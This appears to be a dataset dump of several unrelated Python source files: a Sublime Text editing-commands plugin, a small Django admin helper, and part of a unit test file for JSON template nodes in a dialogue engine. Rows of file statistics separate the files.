# 32=space 9=tab 10=newline 13=carriagereturn 34=" 35=# 36=$ 37=% 38=& 39=' 61== 64=@ 58=: 63=? 46=. 44=, 43=+ 95=_ 45=- 60=< 62=> 40=( 41=) 91=[ 93=] 123={ 125=} 124=| 47=/ 92=\
subwordDelims = [chr(32), chr(9), chr(10), chr(13), chr(34), chr(35), chr(36), chr(37), chr(38), chr(39), chr(61), chr(64), chr(58), chr(63), chr(46), chr(44), chr(43), chr(95), chr(45), chr(60), chr(62), chr(40), chr(41), chr(91), chr(93), chr(123), chr(125), chr(124), chr(47), chr(92)]
for ThisRegion in view.sel():
ThisRegionBegin = ThisRegion.begin() - 1
ThisRegionEnd = ThisRegion.end()
if( (ThisRegion.begin() != ThisRegionEnd) and (view.substr(ThisRegionBegin) in subwordDelims) ):
ThisRegionBegin -= 1
while( (view.substr(ThisRegionBegin) not in subwordDelims) and (ThisRegionBegin >= 0) ):
ThisRegionBegin -= 1
ThisRegionBegin += 1
if( (ThisRegion.begin() != ThisRegionEnd) and (view.substr(ThisRegionEnd) in subwordDelims) ):
ThisRegionEnd += 1
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
# view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
class ExpandSelectionToQuotesCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
# 34=" 39='
beginDelims = [chr(34), chr(39)]
endDelims = [chr(34), chr(39)]
for ThisRegion in view.sel():
ThisRegionBegin = ThisRegion.begin() - 1
ThisRegionEnd = ThisRegion.end()
while( (view.substr(ThisRegionBegin) not in beginDelims) and (ThisRegionBegin >= 0)):
ThisRegionBegin -= 1
ThisRegionBegin += 1
while( (view.substr(ThisRegionEnd) not in endDelims) and (ThisRegionEnd < view.size())):
ThisRegionEnd += 1
# view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
class ExpandSelectionToBracketsCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
# 60=< 62=> 40=( 41=) 91=[ 93=] 123={ 125=}
# beginDelims = [chr(60), chr(40), chr(91), chr(123)]
# endDelims = [chr(62), chr(41), chr(93), chr(125)]
BracketDelims = [chr(60), chr(40), chr(91), chr(123), chr(62), chr(41), chr(93), chr(125)]
for ThisRegion in view.sel():
ThisRegionBegin = ThisRegion.begin() - 1
ThisRegionEnd = ThisRegion.end()
# while( (view.substr(ThisRegionBegin) not in beginDelims) and (ThisRegionBegin >= 0)):
while( (view.substr(ThisRegionBegin) not in BracketDelims) and (ThisRegionBegin >= 0)):
ThisRegionBegin -= 1
ThisRegionBegin += 1
# while( (view.substr(ThisRegionEnd) not in endDelims) and (ThisRegionEnd < view.size())):
while( (view.substr(ThisRegionEnd) not in BracketDelims) and (ThisRegionEnd < view.size())):
ThisRegionEnd += 1
# view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
class ExpandSelectionToWhitespaceCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
# 32=space 9=tab 10=newline 13=carriagereturn
whiteChars = (chr(32), chr(9), chr(10), chr(13))
for ThisRegion in view.sel():
ThisRegionBegin = ThisRegion.begin() - 1
while( (view.substr(ThisRegionBegin) not in whiteChars) and (ThisRegionBegin >= 0)):
ThisRegionBegin -= 1
ThisRegionBegin += 1
ThisRegionEnd = ThisRegion.end()
while( (view.substr(ThisRegionEnd) not in whiteChars) and (ThisRegionEnd < view.size())):
ThisRegionEnd += 1
# if(ThisRegionBegin != ThisRegionEnd):
# view.sel().clear()
view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd))
# else:
# view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionBegin))
#---------------------------------------------------------------
class KnLinelimitCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
for ThisRegion in view.sel():
if(forward): #forward
ThisRegionEnd = view.line(ThisRegion).end()
view.sel().clear()
view.sel().add(ThisRegionEnd)
view.show(ThisRegionEnd)
else: #backward
ThisRegionEnd = view.line(ThisRegion).begin()
view.sel().clear()
view.sel().add(ThisRegionEnd)
view.show(ThisRegionEnd)
#---------------------------------------------------------------
class KnIndentCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
RegionsSelOld = list(view.sel())
#view.sel().clear()
for ThisRegion in RegionsSelOld:
ThisRegionFullline = KnFullLine(view, ThisRegion)
StrContent = view.substr(ThisRegionFullline)
ListLinesStrContent = StrContent.splitlines(True)
NumLines = len(ListLinesStrContent)
ListLinesStrContentNew = list()
if((NumLines == 0) and forward):
view.replace(edit, ThisRegionFullline, chr(9))
view.sel().clear()
view.sel().add(sublime.Region(ThisRegion.begin()+1))
view.show(ThisRegion.begin()+1)
elif(forward): #forward
for StrThisLine in ListLinesStrContent:
ListLinesStrContentNew.append(chr(9)+StrThisLine)
view.replace(edit, ThisRegionFullline, ''.join(ListLinesStrContentNew))
view.sel().clear()
view.sel().add(sublime.Region(ThisRegion.begin()+1, ThisRegion.end()+NumLines))
view.show(ThisRegion.begin()+1)
else: #backward
NumLinesReplaced = 0
for StrThisLine in ListLinesStrContent:
if(StrThisLine[0] == chr(9)):
NumLinesReplaced += 1
ListLinesStrContentNew.append(StrThisLine[1:])
else:
ListLinesStrContentNew.append(StrThisLine)
if(NumLinesReplaced == 0):
#print("case lines none contain tabs at beginning")
pass
elif( (ThisRegion.begin() == ThisRegionFullline.begin()) and (ListLinesStrContent[0][0] == chr(9)) ):
#print("case line 1 cursor at begining of line and contains tab")
view.replace(edit, ThisRegionFullline, ''.join(ListLinesStrContentNew))
view.show(ThisRegion.begin())
view.sel().clear()
view.sel().add(sublime.Region(ThisRegion.begin(), ThisRegion.end()-NumLinesReplaced+1))
elif(ThisRegion.begin() == ThisRegionFullline.begin()):
#print("case line 1 cursor at begininng of line - dont move selection back in beginning")
view.replace(edit, ThisRegionFullline, ''.join(ListLinesStrContentNew))
view.show(ThisRegion.begin())
view.sel().clear()
view.sel().add(sublime.Region(ThisRegion.begin(), ThisRegion.end()-NumLinesReplaced))
elif(view.substr(ThisRegionFullline.begin()) != chr(9)):
#print("case line 1 contains no tab at beginning - dont move selection back in beginning")
view.replace(edit, ThisRegionFullline, ''.join(ListLinesStrContentNew))
view.show(ThisRegion.begin())
view.sel().clear()
view.sel().add(sublime.Region(ThisRegion.begin(), ThisRegion.end()-NumLinesReplaced))
else:
#print("case general case - line 1 move selection back 1 - line last move selection back num of tabs removed")
view.replace(edit, ThisRegionFullline, ''.join(ListLinesStrContentNew))
view.show(ThisRegion.begin()-1)
view.sel().clear()
view.sel().add(sublime.Region(ThisRegion.begin()-1, ThisRegion.end()-NumLinesReplaced))
#---------------------------------------------------------------
class CopyFulllinesCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
strThisRegionFullline = view.substr(KnFullLine(view, ThisRegion))
if( (strThisRegionFullline[-1] == chr(10)) or (strThisRegionFullline[-1] == chr(13)) ):
sublime.set_clipboard(strThisRegionFullline)
else: # there was no newline found at the end - this means it is the last line in the document, so add a newline for it
sublime.set_clipboard(strThisRegionFullline + chr(10))
class CutFulllinesCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
ThisRegionFullline = KnFullLine(view, ThisRegion)
sublime.set_clipboard(view.substr(ThisRegionFullline))
self.view.erase(edit, ThisRegionFullline)
#---------------------------------------------------------------
class KnPasteCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
# view.run_command('paste');
sublimeclipboard = sublime.get_clipboard()
if(ThisRegion.a != ThisRegion.b):
view.replace(edit, ThisRegion, sublimeclipboard)
else:
view.insert(edit, ThisRegion.a, sublimeclipboard)
view.show(ThisRegion.a + len(sublimeclipboard) + 1)
#---------------------------------------------------------------
class PasteAboveLinesCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
PosSelectionBegin = ThisRegion.begin()-1
while( not( (view.substr(PosSelectionBegin) == chr(10)) or (view.substr(PosSelectionBegin) == chr(13)) ) and (PosSelectionBegin > 0) ):
PosSelectionBegin -= 1
PosSelectionBegin += 1
sublimeclipboard = sublime.get_clipboard()
if(sublimeclipboard[-1:] != chr(10)):
#print("ended in a newline not, adding one")
view.insert(edit, PosSelectionBegin, chr(10))
view.insert(edit, PosSelectionBegin, sublimeclipboard)
else:
view.insert(edit, PosSelectionBegin, sublimeclipboard)
#---------------------------------------------------------------
# duplicates line above (instead of below like innate one)
class KnDuplicateLineCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
PosSelectionBegin = ThisRegion.begin()
PosSelectionEnd = ThisRegion.end()
PosSelectionBegin -= 1
while( (PosSelectionBegin >= 0) and not( (view.substr(PosSelectionBegin) == chr(10)) or (view.substr(PosSelectionBegin) == chr(13)) ) ):
PosSelectionBegin -= 1
PosSelectionBegin += 1
if(PosSelectionBegin != PosSelectionEnd):
PosSelectionEnd -= 1
while( (PosSelectionEnd < view.size()) and not( (view.substr(PosSelectionEnd) == chr(10)) or (view.substr(PosSelectionEnd) == chr(13)) ) ):
PosSelectionEnd += 1
if(PosSelectionEnd != view.size()):
PosSelectionEnd += 1 # add the newline that you found
strThisRegionFullline = view.substr(sublime.Region(PosSelectionBegin, PosSelectionEnd))
if(strThisRegionFullline[-1:] != chr(10)):
view.insert(edit, PosSelectionBegin, chr(10))
view.insert(edit, PosSelectionBegin, strThisRegionFullline)
else:
view.insert(edit, PosSelectionBegin, strThisRegionFullline)
#---------------------------------------------------------------
class BlanklineAddCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
RegionsSelOld = list(view.sel())
# view.sel().clear()
for thisregion in RegionsSelOld:
if(forward): #forward
posToInsertLineAt = KnFullLine(view, thisregion).end()
#print(posToInsertLineAt)
view.insert(edit, posToInsertLineAt, chr(10))
# view.sel().add(sublime.Region(posToInsertLineAt))
else: #backward
posToInsertLineAt = KnFullLine(view, thisregion).begin()-1
view.insert(edit, posToInsertLineAt+1, chr(10))
# view.sel().add(sublime.Region(posToInsertLineAt+1))
#---------------------------------------------------------------
class DeleteToBegOfContigBoundaryCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
whiteChars = (chr(32), chr(9), chr(10), chr(13))
spaceChars = (chr(32), chr(9))
# newlineChars = (chr(10), chr(13))
for ThisRegion in view.sel():
if(ThisRegion.a != ThisRegion.b):
view.erase(edit, sublime.Region(ThisRegion.begin(), ThisRegion.end()))
# view.show(ThisRegionEnd) #dont show move
elif(forward): #forward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
while( (view.substr(ThisRegionEnd) not in whiteChars) and (ThisRegionEnd < view.size())):
ThisRegionEnd += 1
while( (view.substr(ThisRegionEnd) in spaceChars) and (ThisRegionEnd < view.size())):
ThisRegionEnd += 1
if((ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b)):
ThisRegionEnd += 1
view.erase(edit, sublime.Region(ThisRegionBegin, ThisRegionEnd))
# view.show(ThisRegionEnd) #dont show move
else: #backward
ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
while( (view.substr(ThisRegionEnd) in spaceChars) and (ThisRegionEnd >= 0)):
ThisRegionEnd -= 1
while( (view.substr(ThisRegionEnd) not in whiteChars) and (ThisRegionEnd >= 0)):
ThisRegionEnd -= 1
if((ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b)):
ThisRegionEnd -= 1
view.erase(edit, sublime.Region(ThisRegionBegin, ThisRegionEnd+1))
view.show(ThisRegionEnd)
class DeleteToBegOfSubwordBoundaryCommand(sublime_plugin.TextCommand):
def run(self, edit, forward):
view = self.view
# 32=space 9=tab 10=newline 13=carriagereturn 34=" 35=# 36=$ 37=% 38=& 39=' 61== 64=@ 58=: 63=? 46=. 44=, 43=+ 95=_ 45=- 60=< 62=> 40=( 41=) 91=[ 93=] 123={ 125=} 124=| 47=/ 92=\
subwordDelims = [chr(32), chr(9), chr(10), chr(13), chr(34), chr(35), chr(36), chr(37), chr(38), chr(39), chr(61), chr(64), chr(58), chr(63), chr(46), chr(44), chr(43), chr(95), chr(45), chr(60), chr(62), chr(40), chr(41), chr(91), chr(93), chr(123), chr(125), chr(124), chr(47), chr(92)]
for ThisRegion in view.sel():
if(ThisRegion.a != ThisRegion.b):
view.erase(edit, sublime.Region(ThisRegion.a, ThisRegion.b))
# view.show(ThisRegionEnd) #dont show move
elif(forward): #forward
# ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd < view.size()) ):
ThisRegionEnd += 1
if((ThisRegionEnd < view.size()) and (ThisRegionEnd == ThisRegion.b)):
ThisRegionEnd += 1
view.erase(edit, sublime.Region(ThisRegion.a, ThisRegionEnd))
# view.show(ThisRegionEnd) #dont show move
else: #backward
# ThisRegionBegin = ThisRegion.a
ThisRegionEnd = ThisRegion.b-1
while( (view.substr(ThisRegionEnd) not in subwordDelims) and (ThisRegionEnd >= 0) ):
ThisRegionEnd -= 1
if((ThisRegionEnd >= 0) and (ThisRegionEnd+1 == ThisRegion.b)):
ThisRegionEnd -= 1
view.erase(edit, sublime.Region(ThisRegion.a, ThisRegionEnd+1))
view.show(ThisRegionEnd)
#---------------------------------------------------------------
class DeleteLineCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
self.view.erase(edit, KnFullLine(view, ThisRegion))
class DeleteLineWoLinebreakCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
self.view.erase(edit, view.line(ThisRegion))
class SelectLineCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
view.sel().add(KnFullLine(view, ThisRegion))
class SelectLineWoLinebreakCommand(sublime_plugin.TextCommand):
def run(self, edit):
view = self.view
for ThisRegion in view.sel():
atchar = 0
charsinline = view.line(ThisRegion).end() - view.line(ThisRegion).begin()
StrThisLine = view.substr(view.line(ThisRegion))
while( (StrThisLine[atchar] == chr(9)) and (atchar < charsinline) ):
atchar += 1
beginpos = view.line(ThisRegion).begin() + atchar
view.sel().clear()
view.sel().add(sublime.Region(beginpos, view.line(ThisRegion).end()))
#---------------------------------------------------------------
#https://forum.sublimetext.com/t/bug-full-line-api-returns-another-next-line-with-it-also-if-region-given-to-it-ends-in-a-new-newline-also/44140/7
#Reimplementation of full_line due to full_line bug in ST3 some versions.
def KnFullLine(mview, mRegion):
view = mview
PosSelectionBegin = mRegion.begin()
PosSelectionEnd = mRegion.end()
PosSelectionBegin -= 1
while( not( (view.substr(PosSelectionBegin) == chr(10)) or (view.substr(PosSelectionBegin) == chr(13)) ) and (PosSelectionBegin >=0) ):
PosSelectionBegin -= 1
PosSelectionBegin += 1
if(PosSelectionBegin != PosSelectionEnd):
PosSelectionEnd -= 1
while( (PosSelectionEnd <= view.size()-1) and not( (view.substr(PosSelectionEnd) == chr(10)) or (view.substr(PosSelectionEnd) == chr(13)) ) ):
PosSelectionEnd += 1
if(PosSelectionEnd != view.size()):
PosSelectionEnd += 1 # add the newline that you found
#print("PosSelectionBegin=" + str(PosSelectionBegin))
#print("PosSelectionEnd=" + str(PosSelectionEnd))
ThisRegionFullline = sublime.Region(PosSelectionBegin, PosSelectionEnd)
return ThisRegionFullline
#---------------------------------------------------------------
# Reference (no longer used)
# class ExpandSelectionToSentenceCommand(sublime_plugin.TextCommand):
# def run(self, edit):
# view = self.view
# oldSelRegions = list(view.sel())
# view.sel().clear()
# for ThisRegion in oldSelRegions:
# ThisRegionBegin = ThisRegion.begin() - 1
# while( (view.substr(ThisRegionBegin) not in ".") and (ThisRegionBegin >= 0)):
# ThisRegionBegin -= 1
# ThisRegionBegin += 1
# while( (view.substr(ThisRegionBegin) in whitespaceChars) and (ThisRegionBegin < view.size())):
# ThisRegionBegin += 1
# ThisRegionEnd = ThisRegion.end()
# while( (view.substr(ThisRegionEnd) not in ".") and (ThisRegionEnd < view.size())):
# ThisRegionEnd += 1
# if(ThisRegionBegin != ThisRegionEnd):
# view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionEnd+1))
# else:
# view.sel().add(sublime.Region(ThisRegionBegin, ThisRegionBegin))
#---------------------------------------------------------------
# Reference (no longer used)
# class MoveToContigboundaryCommand(sublime_plugin.TextCommand):
# def run(self, edit, forward, extend=False):
# view = self.view
# oldSelRegions = list(view.sel())
# view.sel().clear()
# for ThisRegion in oldSelRegions:
# if(forward): #forward
# caretPos = ThisRegion.b
# if(view.substr(caretPos) in whitespaceChars): #initially have whitespace right of me, find char
# while( (view.substr(caretPos) in whitespaceChars) and (caretPos < view.size())):
# caretPos += 1
# else: #initially have char right of me, find whitespace
# while( (view.substr(caretPos) not in whitespaceChars) and (caretPos < view.size())):
# caretPos += 1
# if(extend):
# view.sel().add(sublime.Region(ThisRegion.a, caretPos))
# view.show(caretPos)
# else:
# view.sel().add(sublime.Region(caretPos))
# view.show(caretPos)
# else: #backward
# caretPos = ThisRegion.b - 1
# if(view.substr(caretPos) in whitespaceChars): #initially have whitespace left of me, find char
# while( (view.substr(caretPos) in whitespaceChars) and (caretPos >= 0)):
# caretPos -= 1
# else: #initially have char left of me, find whitespace
# while( (view.substr(caretPos) not in whitespaceChars) and (caretPos >= 0)):
# caretPos -= 1
# if(extend):
# view.sel().add(sublime.Region(ThisRegion.a, caretPos+1))
# view.show(caretPos+1)
# else:
# view.sel().add(sublime.Region(caretPos+1))
# view.show(caretPos+1)
#---------------------------------------------------------------
| 45.038147 | 291 | 0.645593 | 3,651 | 33,058 | 5.835114 | 0.064914 | 0.033843 | 0.057219 | 0.030323 | 0.832285 | 0.804027 | 0.788256 | 0.771827 | 0.746808 | 0.738077 | 0 | 0.0343 | 0.185099 | 33,058 | 733 | 292 | 45.099591 | 0.756524 | 0.198772 | 0 | 0.798932 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042705 | false | 0.001779 | 0.003559 | 0 | 0.088968 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cf83ea2b50055e3554ceaee7d37a71132fdce354 | 180 | py | Python | django_admin_index/utils.py | maykinmedia/django-admin-index | 27f127f0397f9f664c2f0494854d38acdeaf514a | [
"BSD-3-Clause"
] | 68 | 2018-01-24T13:54:28.000Z | 2022-03-28T07:57:21.000Z | django_admin_index/utils.py | maykinmedia/django-admin-index | 27f127f0397f9f664c2f0494854d38acdeaf514a | [
"BSD-3-Clause"
] | 71 | 2017-07-31T08:07:57.000Z | 2022-03-16T08:34:43.000Z | django_admin_index/utils.py | maykinmedia/django-admin-index | 27f127f0397f9f664c2f0494854d38acdeaf514a | [
"BSD-3-Clause"
] | 9 | 2018-11-12T14:41:08.000Z | 2021-06-15T20:06:10.000Z | from django_admin_index.conf import settings
def should_display_dropdown_menu(request):
return settings.SHOW_MENU and request.user.is_authenticated and request.user.is_staff
| 30 | 89 | 0.85 | 27 | 180 | 5.37037 | 0.740741 | 0.137931 | 0.193103 | 0.22069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 180 | 5 | 90 | 36 | 0.895062 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
2b08b769da0aa7539b0867daa2c4fe893a0ad261 | 71,446 | py | Python | dialogue-engine/test/programytest/parser/template/node_tests/test_json.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 104 | 2020-03-30T09:40:00.000Z | 2022-03-06T22:34:25.000Z | dialogue-engine/test/programytest/parser/template/node_tests/test_json.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 25 | 2020-06-12T01:36:35.000Z | 2022-02-19T07:30:44.000Z | dialogue-engine/test/programytest/parser/template/node_tests/test_json.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 10 | 2020-04-02T23:43:56.000Z | 2021-05-14T13:47:01.000Z | """
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import xml.etree.ElementTree as ET
from programy.parser.template.nodes.base import TemplateNode
from programy.parser.template.nodes.json import TemplateJsonNode
from programy.parser.template.nodes.word import TemplateWordNode
from programy.parser.template.nodes.select import TemplateSelectNode
from programy.dialog.question import Question
from programytest.parser.base import ParserTestsBaseClass
class MockTemplateJsonNode(TemplateJsonNode):
def __init__(self):
TemplateJsonNode.__init__(self)
def resolve_to_string(self, context):
raise Exception("This is an error")
class TemplateJsonNodeTests(ParserTestsBaseClass):
# GET
def test_json_get_typename(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("name_json")
node._type = "name"
node._key = TemplateWordNode("key_name")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
conversation.set_property("name_json", '{"key_name": "value_name"}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("value_name", result)
def test_json_get_typedata(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._key = TemplateWordNode("key_data")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
conversation.set_data_property("data_json", '{"key_data": "value_data"}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("value_data", result)
def test_json_get_typevar(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("var_json")
node._type = "var"
node._key = TemplateWordNode("key_var")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
question = Question.create_from_text(self._client_context, "Hello", self._client_context.bot.sentence_splitter)
conversation.record_dialog(question)
self.assertIsNotNone(conversation.current_question())
question.set_property("var_json", '{"key_var": "value_var"}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("value_var", result)
def test_json_get_key(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._item = TemplateWordNode("key")
node._index = TemplateWordNode("2")
node._key = TemplateWordNode("key_data")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
conversation.set_data_property("data_json", '{"key_data" : {"key_1": "val_1", "key_2": "val_2", "key_3": "val_3"}}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("key_3", result)
def test_json_get_len(self):
root = TemplateNode()
self.assertIsNotNone(root)
self.assertIsNotNone(root.children)
self.assertEqual(len(root.children), 0)
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._function = TemplateWordNode("len")
node._key = TemplateWordNode("key_data")
self.assertIsNotNone(node)
root.append(node)
self.assertEqual(len(root.children), 1)
conversation = self._client_context.bot.get_conversation(self._client_context)
self.assertIsNotNone(conversation)
conversation.set_data_property("data_json", '{"key_data": ["list_1", "list_2", "list_3"]}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("3", result)
def test_json_get_empty(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._key = TemplateWordNode("key_data")
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_data_property("data_json", '{"key_data": ""}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual('""', result)
def test_json_get_int_value(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._key = TemplateWordNode("key_data")
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_data_property("data_json", '{"key_data": 100}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("100", result)
node._function = TemplateWordNode("len")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("1", result)
node._function = None
node._index = TemplateWordNode("0")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("100", result)
node._index = TemplateWordNode("0")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("100", result)
node._index = TemplateWordNode("-1")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("100", result)
node._index = TemplateWordNode("1")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("unknown", result)
node._index = TemplateWordNode("-2")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("unknown", result)
def test_json_get_list(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._key = TemplateWordNode("key_data")
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_data_property("data_json", '{"key_data": ["list_1", "list_2", "list_3"]}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual('["list_1", "list_2", "list_3"]', result)
def test_json_get_list_element(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._key = TemplateWordNode("key_data")
root.append(node)
self._client_context.brain.properties.add_property("default-get", "unknown")
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_data_property("data_json", '{"key_data": ["list_1", "list_2", "list_3"]}')
node._index = TemplateWordNode("0")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("list_1", result)
node._index = TemplateWordNode("1")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("list_2", result)
node._index = TemplateWordNode("2")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("list_3", result)
node._index = TemplateWordNode("3")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("unknown", result)
def test_json_get_list_element_from_end(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._key = TemplateWordNode("key_data")
root.append(node)
self._client_context.brain.properties.add_property("default-get", "unknown")
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_data_property("data_json", '{"key_data": ["list_1", "list_2", "list_3"]}')
node._index = TemplateWordNode("-1")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("list_3", result)
node._index = TemplateWordNode("-2")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("list_2", result)
node._index = TemplateWordNode("-3")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("list_1", result)
node._index = TemplateWordNode("-4")
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual("unknown", result)
def test_json_get_dict(self):
root = TemplateNode()
node = TemplateJsonNode()
node._name = TemplateWordNode("data_json")
node._type = "data"
node._key = TemplateWordNode("key_data")
root.append(node)
conversation = self._client_context.bot.get_conversation(self._client_context)
conversation.set_data_property("data_json", '{"key_data": {"dic_1": "val_1", "dic_2": "val_2", "dic_3": "val_3"}}')
result = root.resolve(self._client_context)
self.assertIsNotNone(result)
self.assertEqual('{"dic_1": "val_1", "dic_2": "val_2", "dic_3": "val_3"}', result)
def test_json_get_dict_key(self):
root = TemplateNode()
node = TemplateJsonNode()
